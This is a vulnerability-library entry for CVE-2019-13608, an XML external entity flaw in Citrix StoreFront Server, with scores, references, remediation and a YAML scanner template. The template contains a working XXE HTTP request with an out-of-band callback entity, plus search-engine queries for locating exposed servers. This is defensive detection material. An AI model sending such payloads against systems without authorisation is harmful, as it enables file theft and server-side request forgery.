/Vulnerability Library

Citrix StoreFront Server - XML External Entity

CVE-2019-13608
Verified

Description

Citrix StoreFront Server before 1903, 7.15 LTSR before CU4 (3.12.4000), and 7.6 LTSR before CU8 (3.0.8000) allows XXE attacks.

Severity

High

CVSS Score

7.5

Exploit Probability

71%

Affected Product

storefront_server

Published Date

January 22, 2026

Template Author

daffainfo

CVE-2019-13608.yaml
id: CVE-2019-13608

info:
  name: Citrix StoreFront Server - XML External Entity
  author: daffainfo
  severity: high
  description: |
    Citrix StoreFront Server before 1903, 7.15 LTSR before CU4 (3.12.4000), and 7.6 LTSR before CU8 (3.0.8000) allows XXE attacks.
  impact: |
    Attackers can read arbitrary files, perform server-side request forgery, or cause denial of service through XXE attacks.
  remediation: |
    Update to version 1903 or later for StoreFront, CU4 or later for 7.15 LTSR, CU8 or later for 7.6 LTSR.
  reference:
    - https://www.exploit-db.com/exploits/47561
    - https://support.citrix.com/support-home/kbsearch/article?articleNumber=CTX251988
    - https://nvd.nist.gov/vuln/detail/CVE-2019-13608
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2019-13608
    cwe-id: CWE-611
    epss-score: 0.71255
    epss-percentile: 0.98734
    cpe: cpe:2.3:a:citrix:storefront_server:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: citrix
    product: storefront_server
    shodan-query: "/Citrix/StoreWeb"
    fofa-query: "/Citrix/StoreWeb"
  tags: cve,cve2019,citrix,storefront_server,xxe,kev,vkev

http:
  - raw:
      - |
        POST /Citrix/StoreAuth/ExplicitForms/Start HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/vnd.citrix.requesttoken+xml
        Accept: application/vnd.citrix.requesttokenresponse+xml, text/xml, application/vnd.citrix.authenticateresponse-1+xml

        <?xml version="1.0" encoding="utf-8"?>
        <!DOCTYPE requesttoken [<!ENTITY % xxe SYSTEM "http://{{interactsh-url}}"> %xxe; ]>
        <requesttoken xmlns="http://citrix.com/delivery-services/1-0/auth/requesttoken">
          <for-service>6b78ab94-a709-4e3a-8b9b-a49ca317c70c</for-service>
          <for-service-url>https://www.example.com/Citrix/Store/resources/v2</for-service-url>
          <reqtokentemplate />
          <requested-lifetime>1.00:00:00</requested-lifetime>
        </requesttoken>

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: content_type
        words:
          - "vnd.citrix.authenticateresponse"

      - type: word
        part: body
        words:
          - "<AuthenticateResponse"
          - "error-bad-request"
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100cbefe440140d3110983879b304c6a3aae272b6296e56247fdcc1454eb5346994022100b824fcae04995faa8e15f1fc58c9bb1a4bd5c64cddf53cc0d2e31f43271a02a4:922c64590222798bb761d5b6d8e72950
7.5Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CVE ID:
cve-2019-13608
CWE ID:
cwe-611

References

https://www.exploit-db.com/exploits/47561https://support.citrix.com/support-home/kbsearch/article?articleNumber=CTX251988https://nvd.nist.gov/vuln/detail/CVE-2019-13608

Remediation Steps

Update to version 1903 or later for StoreFront, CU4 or later for 7.15 LTSR, CU8 or later for 7.6 LTSR.